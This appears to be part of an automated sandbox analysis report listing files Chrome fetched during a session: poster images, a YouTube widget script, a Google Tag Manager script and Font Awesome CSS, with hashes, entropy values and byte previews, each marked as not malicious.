                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4....................................................................y.Y.v.L....)adSxK.XB..}(..X...^...i.}.......[+R.ke.(.l...k.h...h...v.."Ycvx.{...Ol........>4>.$...{rC......"N.a..$...L..p.a.#..9 ...{...a"Eg.e...M...=,#.u....5....Y.T./y..'s(..Ap.m ...YZ}........,..\.Z......,;|.....}......;.o......>.k.{.....~.}..%.noz..../u.>.t.+\4.2U.-|M.h...X....<.p..E..s.....k.,.......f.H...:/>}'.^}....z^Rl...........|...E.!$...+..|.....jC....e....n.z....b.&22M...e$..z=l..q.........,@#..c..=...$4..b...A.[.%I...0b9 I..p.5.....y...jR..C....._^.{3.V.+...]..e.....C..,..Kx#I.$z....z.g.......S+.0..H.|..HId...o.9....$.....x..........<.|.`4\=I.=v.I".F...z.Zj.[...4.c......(Y.D.".qn..]..qj.. E..;....;.W<.....j....D.s.|Y.x.l&r.L.....w>..q?.m.f.F.Fp..P.Fs.Fab........-Z..;.;=...UX"..q.[...R..0.m....2.....}..m..w.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x444, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):37973
                                                                                                                                                                                          Entropy (8bit):7.983740757081899
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:2DTZ2wZOQtNdbWj5DPQswV9Uwocp93oIrnpSuIRFwWzVmsIojyfaYsF:2DdLZR5WZMV9+E9lrnp5IXHzxIBaYsF
                                                                                                                                                                                          MD5:663E3D11350AA6C0619FF525B3DE5660
                                                                                                                                                                                          SHA1:B4D6DD5093265724D765E214A96876DFE5CC513C
                                                                                                                                                                                          SHA-256:C89AB73F403678CB7332EAFA0496229E1E25AA5447704E315299871C7C3B9A1B
                                                                                                                                                                                          SHA-512:8714BF1F8A110021AE74D02DB5443F816A10E1C33372A0C06CF2905B030872E1F085D8456A05ADB6BAF1C5726CC784F93001FDD1047CE420E75AB053F67F1A45
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BODUyM2Y1MzgtZDIwNy00YzRjLTkyMGQtYzZiODI5MWEwZDdkXkEyXkFqcGdeQXVyMTQ2MjQyNDc@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6...................................................................XBp.l@..x@...0'..!; .N. ......; .N.(....tAr.....a........)....J..|.F.....eE/.E.5.r.p.M.k.K..y.]!..1b.^....j.5...b..5.....SM.2]B.R..te.nVZ....$q.O(..ny...|..>..+{"...2x.x2D...7.}".t4.Us...k..8..|4.*%u..+.+.5NE.=;.u.(..H.0.#.(.y)m.H..g9."].Q..-......\..=z`..m.S...0..."..j.l...Sm.5.sM.8.:e......0ozm.e.2D.d60Mt..d...y\X.......3....Cc\..H..A.3.r.u.0L.\.Y1....&t.T`.+fq.,..Z......|.../.vx.Wy...@......2...7E.W.....,B9#.&q...9.0....].....I.g..gm6..:..y........lj..W..a1..Il.7T+..+....,.%......)..`..K..j.l.......|e.k...q.m..... `..u$Y....r.....=..[.o..k.7 .M.....z..)..7I+.)...\..".(#o.h...]K..l..,.j|...L..*I;5.H.o/.>=.o.;..S .S....g._...{7..#....2.h..G.X>p.W....3..ez...9lY...Y3.jv...ZO.jI[...7.}e..Y+6[b..ES.:...D..-.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x400, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):27556
                                                                                                                                                                                          Entropy (8bit):7.964260456791798
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:CECzPG0DcRdQ7467a7lhOoSsDuqg5oUQc:Ctu09Xm7CsqqgiFc
                                                                                                                                                                                          MD5:A0378D7F05416DAAF0931676A145042C
                                                                                                                                                                                          SHA1:EB61196A948309D5B43561D930CBB7EA9A1C48FF
                                                                                                                                                                                          SHA-256:8852EACFB721FCE2A3E460A2005CE70C47995429F252D8F458EDDB4CAA8FD344
                                                                                                                                                                                          SHA-512:462448D47B97D7FAB2E9D816122544655F8A9606AC235319F152EB1530EEBA8E4C9969F9BC835EA8AEB539D2EE78D2E38B361EF83F4E23B54B89F12629826F4E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4..................................................................Mn......LuB..J.\T..8QB.Qz...*U%:.uN-(....F..8F.$....bSd.I..Mq..Z..p*.....PVOc.\5......4.".#...W\..A...H..5F@.|..9f.....X...........".<..&.O........I,)..B.*X..x..S........!...........<...#..U..AN..2...A.z.z^0OF.$.S|.p<.z...f@.........@..@....p...f........&F..>|#q\.^..1.<.X....L..m.{.m`.......!.........y.U...=..z......9....$..@....=..em.)...V$*...h../5...0..... n..........L.G;0....e../.1m......tR.5...OGfZFtc;...s......<..........@.!..t.......x..+.....'.n.X0.:....dOL....|....M.C......?X..}...%..-.w..p.....z8...F.O.:@...`....v*.....;%.....-U.j...Hz#..',7Z...%...E.n....Z..'I.*.H...W.W.....Q..^...Y..BIv...4q...o3...6.!bo....X.d.A3.).8.-Z.h.JC.x+..+dj..%.0...<^...6.._k.K%q.=K"...T...2.Uu~..0.Q_?...f,.R7....cS.v-Q.j..N...6.lK
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x433, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):24634
                                                                                                                                                                                          Entropy (8bit):7.968460019889492
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:7MaYUZMjf5vRFx54KdhWnTMpY32lsc6eqHeGX:Qzf5DxWK+nApY3WE/HeGX
                                                                                                                                                                                          MD5:E6386AB927D99700F6C5250DDB64FF5D
                                                                                                                                                                                          SHA1:A026A75D2FFA766CF617C4D37283B6A043624DF5
                                                                                                                                                                                          SHA-256:8B03CEFF02EC9097FD9EFE3939B6EE13885FABF5BF85BF9E4B99B10620ADD136
                                                                                                                                                                                          SHA-512:9452FEF29189673040924CBE5FA9027A655C44A229A8C336F03772787AE925A4C338D28375346C718B5411C769283A00E6ED08069911E26A574A6BC39DA9697D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................G..z....y.R.u{.Ke.-..pu....bG..U$.6oT.Jj..W..;.h.~.m&..O..De.I.3........9..H..........:..d..Yy.W..[A.}....-!....[...F4.u../..F.|...".+....r0....;...........g..S")..~.........o...#..q...ya..*V+9Ze....>..8.].:xnq...A4.{.-..[w+.]#..y2H.Vi.Gh.\....6.^.ip.....DDs#s.~H....l..@...+,.....I...T..p.....G....^^...tm.......J.O...O\.S.j.D...-a....d..c9Z5.`^.>.L..~h....Jp...v?../J.`?....Y,.&-.G.Dn.......[..2f..7.....8|.B..6..Uy...+...U..k..ez}d..c.N4..6;....X....vj......j@{0.~.......r=.k.X..^..x.\.u.Oz-.B...MN...M,wBK.}..K.\..$..+G....../..T.-...{.`mch.!..w)^j.....Ppk+..(.S_.A=.....6a)...b..X..M..5..4..-...C.DL#3..1...........n[1-....H...tp.o*..g.y....J_J..pmK...D.H..%G..c....!...]..m9vH.&....^..+...:....U.C.........W..FN.o~.....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (501)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):993
                                                                                                                                                                                          Entropy (8bit):5.289915108457373
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:E1WXIbtEHvIYWwmqAK/HJ2cNAXzk5vuHM8aJLtMCRWZ4FhQ:E1WXmtEPT6cLAXzk5kaJL+CwYhQ
                                                                                                                                                                                          MD5:412EA828C68BC97BCDEAA7B7E9B41C61
                                                                                                                                                                                          SHA1:F67ED2E0224E9C54ABA069B483DA15E81078FEBD
                                                                                                                                                                                          SHA-256:F8D1544BB47C74EF9A9B177A721C628AEFF0BE0F9F6A57B18769A7D67055C759
                                                                                                                                                                                          SHA-512:365C069834C20523B04A46E3CB3FF57DD31962D2129FB930AEE8C73E2CC626E7BC83E9BF8E448E1FCE81FCA900A6E6CA3A43F1F8F8D254B567FEBC8F61C83FC1
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:var scriptUrl = 'https:\/\/www.youtube.com\/s\/player\/f8f53e1a\/www-widgetapi.vflset\/www-widgetapi.js';try{var ttPolicy=window.trustedTypes.createPolicy("youtube-widget-api",{createScriptURL:function(x){return x}});scriptUrl=ttPolicy.createScriptURL(scriptUrl)}catch(e){}var YT;if(!window["YT"])YT={loading:0,loaded:0};var YTConfig;if(!window["YTConfig"])YTConfig={"host":"https://www.youtube.com"};.if(!YT.loading){YT.loading=1;(function(){var l=[];YT.ready=function(f){if(YT.loaded)f();else l.push(f)};window.onYTReady=function(){YT.loaded=1;var i=0;for(;i<l.length;i++)try{l[i]()}catch(e){}};YT.setConfig=function(c){var k;for(k in c)if(c.hasOwnProperty(k))YTConfig[k]=c[k]};var a=document.createElement("script");a.type="text/javascript";a.id="www-widgetapi-script";a.src=scriptUrl;a.async=true;var c=document.currentScript;if(c){var n=c.nonce||c.getAttribute("nonce");if(n)a.setAttribute("nonce",.n)}var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b)})()};.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x400, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):26137
                                                                                                                                                                                          Entropy (8bit):7.978827125007284
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:DLrTljnLrr1rzsuDzygKECaaz3mJYMvIONCo:DzJPriuDuxT0JLg4Co
                                                                                                                                                                                          MD5:4460D78E053AC7392C39131F60A3CE5B
                                                                                                                                                                                          SHA1:A96EBA3880BDF14F72C4A8D88794D785C70FF0E7
                                                                                                                                                                                          SHA-256:F352A4B70BAE5A58F5827155C98C82F3DC8FA4E42B716A06996EFE40043D767F
                                                                                                                                                                                          SHA-512:EB7C660ADECCC52E78A13D5635714CE9D01ECF82531AE8980843C9762B9F398E26A9A453B462A9A10DC2E0D1F1AA405C48B174682FA649ECBE8925B8A2E9BB9C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BMDNlNDIyNGQtNWUwYy00MjZlLThmMmItZjEwMjEyM2E5OGQ5XkEyXkFqcGdeQXVyODk1MjAxNzQ@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6..................................................................E...>k.ob.EzUq.......2.B...X.....p.7...vJ.......^gc.]..........P!]n.....9.T.O....i.ux.....!....).{......!M:*..^Wd.w...X..o..x9W3...c.[...J...S.u...q.gm...^...t.{.....+....b.O....yk]}..O\=...#...7\...n.T..E..W.....Yj!...$6.^.q.+u@..G.s]./t.,.l.......z+.:=.l<..z....f..*>.m..'.......OZ.Q..Pq.../.3..My...[|.G.3.rG..2I.GpP..+.`W6%!....U6Wc.t...p}YUrE:k./.E...p...2.=..h..'F.O...j...9.......9+.y7V(2.r......'....}o.O..!<S.$..e.3......4.x...~y...~..p....R...2.m.amPu.aB.:.m.%"8..F>...].......\#>.~V..FP..t..w...l1...,}}...g.4..If......p0.JE..|.9WZ..X.ji......s.Lf.g..j.J...... ... ..`d.)..5..._.....4.]..|+..1.+se.}rh..8.....fL..+.m....}......\..-.V......U.Y..K....+;../....>..),.)...."........-....0S...-. .g
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x450, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):28244
                                                                                                                                                                                          Entropy (8bit):7.979520991201423
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:Tenz2IpzbF+PPL5xRMZrBnPte2VZU0Cas:TO2IO75xRMZVPQ2VZU0Cas
                                                                                                                                                                                          MD5:F9146A3A7D4B8AD0B94455BE4CD581D6
                                                                                                                                                                                          SHA1:C74606D71B520E63500BC9BA29814324D183CD73
                                                                                                                                                                                          SHA-256:653134BFCF8BA882E20FE6FE6B91D170EEA5C34B263487A926EF7110481953D5
                                                                                                                                                                                          SHA-512:0C38E4539034B9A904977A74B125D19B85C1C5AC52CEF2ED2473EE63D5498D07C1A2763D1D66D73FC32FBDA1FCD11C603B3CF661E9D41FCDF7342802EDD0B3F2
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BZDk3YzBiOTItMTY3My00MWZhLWI5MTYtNDU5Yzk3NThjZDQzXkEyXkFqcGdeQXVyNzM3NDU4Njk@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................^..:..}V..}./Z.....I..w..w..s..>U.e-)...I..2f...s....U{.:......je.:S..............#M....W.e....L{.M9w..N\.....M..%7..-.8......._..8.7..r.=.Ur.O2T..0%C.q....Y..9.)!i..o1m..U..2...V.bn......8....an/".#.1..;.Lu.2.66<=Gai..........*p...W..Y.....P....0*f..}..j.>.2...4.18....?tE...B....R...3.lnk...Z...............v.D..b.u... ]....p......*@.1dK.. ..J[[.2.....\.(;.Rr....+..}...6..ld..n<.6.....X..^B.((..fI.y.K.87I.!.0.f*..(9..oR8.. U...U.]iQ.:......=.$F..[:...{/..:<.s.,#.z q..33..c1d..V?{.x....Z...\,q.C.l../=..r.4zo...E.u{\...cQ..l.=.[.2d@.e.F....ICtY]B.[..1!...w....|.yp.l=.?LT"Q_..m.d..i..|.Z..M..@.I....@..0\.%U,....C.Ft;.y1^}L......<.]Lt........v..\..7..q..F...&.../..-..V;......q}4t.P{..1.V...R.....DkKI....3.=....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):315370
                                                                                                                                                                                          Entropy (8bit):5.5861392005459125
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:34S5YnsmQ8odZ1HcRCrKkEZMf3/JrfyXuT+bs+X:ISZm9od7Hc8C9PX
                                                                                                                                                                                          MD5:9F43132A7E441D1A71FFB3F439321543
                                                                                                                                                                                          SHA1:CB5BD2EB7A1EDEE7096DCE637A7192C0862859E8
                                                                                                                                                                                          SHA-256:5C1A569948E83EA1FE3D5C9F77DB65C42C67923CF9FBB689D3CA52463B34D0C3
                                                                                                                                                                                          SHA-512:AA8710ECFA31EBB1CA9926FB29D737A40AF0FB18FF86206D7A7454B5EA6B9CA14416D4A1CE146C5E28C66E55FBF5EB862E61ECC9AF34ADA196625E1B950C2E07
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=G-RYBM6VWWHG&l=dataLayer&cx=c&gtm=457e4cc1za200
                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":22,"tag_id":6},{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddres
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x451, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):42594
                                                                                                                                                                                          Entropy (8bit):7.980623182070504
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:VXgIoIrCoT67bqeNxagV+DlHjzQKucMwNVVYHnhmhFpURIdhTxC3tcNuyut:2OCoevGxHnQKIq8IFZjs3tcU
                                                                                                                                                                                          MD5:E53069F7D61D70A90333D5DD36FBE0A8
                                                                                                                                                                                          SHA1:B4993CC79E8CC565DB8AF1573C131EFEE1D2E2CB
                                                                                                                                                                                          SHA-256:19ADDF139EC4F2DA487C3AB42E75168CB124B50973BD8EC82E87371B223E9799
                                                                                                                                                                                          SHA-512:4BEE2A5232F0D1585DFFE77D564EDEC81C7930A7EBE7EBDB7C93D8C27FF0917D0E4D53492B67D4039794B0F8274127B35249C75E657F1D9ACDA6FAF1679DBA7B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BNzQzOTk3OTAtNDQ0Zi00ZTVkLWI0MTEtMDllZjNkYzNjNTc4L2ltYWdlXkEyXkFqcGdeQXVyNjU0OTQ0OTY@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4................................................................@#..w.3.n/9.zFKL..rT.~.....#..p#.;Sz`.9Nn.dw...N=..o3...sgn....8....D..[...'..t1j.....|7i..75.0......;+..C....%...K...@...A....$t...h^..0Y. ...[u.tl..O.2..p...2y.........a....l.ka........g..5..V.#b......,T......oKk....[.WQE.l...C.J*T.efw...W.q"<./.....,-.o..y2..p..np....^..F.I......h...}.k/NS~.........r....~.e>.....c...~..Y)=..4 c6..c.M..h*X...f.N.....gK..`S..Y....w.:.{W.%..*.4...b...:y.1.M..R..UT.q.8;..|R.5!C1.p_Y..>..ac}.z..+.V...~..l..n.,/4c.u..Ms..:h.<.!(.P...Msu..../......-).<.o6.Uj..R. 7..Z......~n..g....s.O.....#].m.d#..<..&....^we.u.l^z..V...^:....M5...,...%...Ht.. .=..s...M...E...:<..<..K.......5OnTP.1.....Yi.RP.7.............n.....t.N.M..)].~..u...+.3....B.Kr.F=.v..,.N..G.=.n...........;7.J.././.....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (30837)
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):31000
                                                                                                                                                                                          Entropy (8bit):4.746143404849733
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:wHu5yWeTUKW+KlkJ5de2UYDyVfwYUas2l8yQ/8dwmaU8G:wwlr+Klk3Yi+fwYUf2l8yQ/e9vf
                                                                                                                                                                                          MD5:269550530CC127B6AA5A35925A7DE6CE
                                                                                                                                                                                          SHA1:512C7D79033E3028A9BE61B540CF1A6870C896F8
                                                                                                                                                                                          SHA-256:799AEB25CC0373FDEE0E1B1DB7AD6C2F6A0E058DFADAA3379689F583213190BD
                                                                                                                                                                                          SHA-512:49F4E24E55FA924FAA8AD7DEBE5FFB2E26D439E25696DF6B6F20E7F766B50EA58EC3DBD61B6305A1ACACD2C80E6E659ACCEE4140F885B9C9E71008E9001FBF4B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
                                                                                                                                                                                          Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x430, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):29684
                                                                                                                                                                                          Entropy (8bit):7.972512887085643
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:NfdOZamC2bIB++8FxcyA7xtJI2sxHm2umiwoxTd:tdZabI8VFmd7xA3LibR
                                                                                                                                                                                          MD5:A73353C3E661EF6383D61F416DE01883
                                                                                                                                                                                          SHA1:098335A76128AC06CFFB432F351D377221C7CD76
                                                                                                                                                                                          SHA-256:4CA6FEB429BEBA2F2A4AA351760CAC03CAB4C8F24B8070EACF084F9CC21979B1
                                                                                                                                                                                          SHA-512:E65022508D38DFCA66253F06551813FDDE0D2E2617ACF62B7197D6DB29291AD6632D51F81B3454C2AEBE469EDAC5B1EE33492EA400BAD2EBB77BA7278D108B31
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BNmY5MGM2NWQtNGVkMi00ZmQ1LWFkZWMtYjRkYjhmNTRiNjY0XkEyXkFqcGdeQXVyMjUyNDk2ODc@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4...................................................................Z...}.k.6.--y;...s..#...A#...1it.l.......6.......kT.......Nt.N....$sd..j.!4..N..[#Y.....S.^_p^g..oU....O..........K.q..*.G..#..\..1...y..\..HY......}.....Zg.U4.o..i..a~!9..$]2pQ/....l...D..o.2..u....Z.}j...Z:f......t9T.K.....7o..*S;n.c....+.*....a.L.{'L.9.bb........Y.t..%.^.n5...?..3.<........-....r.D..m...]X......J.]".i....S...u6.....'......8.....G..|..f....G...(.kP...D..v.....x...c..Y.....^....?}.....U.X..<...+jty.....mY..R5...=|U..;.|..X....2......G..4.....mU.3..S.....g.q._(..^.O.sM.....=...^.(.9.A....>..^..V./I.SN.....d.^'..y.@.....W..a......z..'vr....h...\....z.....c.a4.J.n......G....y..f.a...@.u..;>.. j..99.^mJ2.c..F..AY..x4G2|.....ar.B;E...w........|?..'.......:L./..g...-...W~q=u..d D._..1...
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x435, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):22247
                                                                                                                                                                                          Entropy (8bit):7.976250045230036
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:h2qTjhTnrDbxWwzbiZW7G4rashdtCY0hnJ/YZP+fTYDTDQojgFX8dNZkZ4/odkLW:9tDbXMwashdEYAJAZPlDfQLFsdNZ+4lW
                                                                                                                                                                                          MD5:562A88D7BC4A73DB9497CE66D656A0B3
                                                                                                                                                                                          SHA1:C18CEF6F377EE84902B563353138ED10796BFB87
                                                                                                                                                                                          SHA-256:54745E1F286A7DB96CDF205EBFCB57A4FE39E7D29E74745D1DA39105026D1AB3
                                                                                                                                                                                          SHA-512:863DA0A9B99533EF2413ACDF9F7199CD817631ACF3C885426EEC8331B6FB7B8DD0E79A3A2F5F0920404267F62C565868751C94AAF144695B04991DAF5F9C78E1
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................I.....#I.@|H...GT..X..)X4...l....bV-..+..yL....V$..AF.j,'E.Vl..=.u.&.......G..m..I{.mm.68.2.)i.QC0.OWY......9..]..x.u..2t.;6..NbV..O..:..<..h^.R...<....e..]..Nf.7..3.\w.&..(I..BLU.UB7....Mw..&....u.......Y..V.)o..Im.%.).w..n...S..]M..^.5.....%..-rb.[..e.....O.;..D...6FB.......nu..By...t.q.,}.....;'J.J.T..k...V.;.....>.Y..:....C.SQ+&.D./...K...F...m.c(.l&...{...u..zN.j..0....?.../C.....J.z.;fkI..!X...1._.V..JCb%.\..E;..E.B.*.f.\..R?".I..{....`.']7..cx..cVOy....R.mv.....u....Mr.).JJ..I.........:....6..5{/?.X&....nq0..........L]....*.=.J......K.$.1UX.mI$!....D~i.8.....\.3.J..2x.RqT.+...#.Y..\-P&..F.......;]^.|.+......$..._.......\.n...$.}.duV....M..k..E+6.CN....cz...jon....#..._..n....#..5OF...zg..-L.^.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x463, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):36095
                                                                                                                                                                                          Entropy (8bit):7.975694499242551
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:6lDDXGnG8nvy5hjglqfOdCjg8s3YSTm0+JYVIzs3y4:m4GIvKloP8s3Yv0zOG
                                                                                                                                                                                          MD5:91338A967DF2B366007DC5A416B92894
                                                                                                                                                                                          SHA1:1E87D9945C999967C522DC9842EFC4F93A2018CF
                                                                                                                                                                                          SHA-256:D1B083C9225649D81AEFE2483968834ED8D3666E6ED28D6F4A1784B768C81D3F
                                                                                                                                                                                          SHA-512:35E6702FEEB73E54EC151BDA4B753CABBDAF11A71244C6FA6B4214A091622B1E59F557E4C5650D06C38F30DA2C3FF80552A8D8773463AD695F3292A5E5ED8D27
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5....................................................................}..&.uO.../`.7,na.X.U.g?..nj...]...9....Q..n`....b.Q.../a...[&A...9....gS...aA>0......~...q...'...+..<.w.!s.....1....E....i_..l-.Y.d...N..Pyi.ep.:.,....\....lA.A.3da......2.T.6.Z.xu.7.g.xM.AC.x..X.^/n/.%.+.z..+.|..&..cn.....+......tC...q./&*64.1.....X.s.e..?.....R]6.........V..t..T.Kr....~=d.I...;8....)...;).:.N{....(....8.zj.5N...f.X..]...I..n*.x.s}G.eM.Yo..s.%.G..)`("x..~./'...z.~..]^Y.>...A-.Bl........=+.U...*....\=.T......o....'.aD...d..q.2^.[oB..z/...`l<}..|..0/.....*.:..V..k.....% ...0..Xw.s....S.....o..wIh.2.v...Is.j.+..\.oia...a.-.4.hm\.dyzsV@..|..P.:.DN...=e~]9..4....}....L. N....TMC..q..5...)45...F...rGB.B>...7+..1..-.%F..3/.J.......?.b?.O.0D...:.............n......A....A}..+;.=..}s'_.-.!..k.j.'..#.^.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
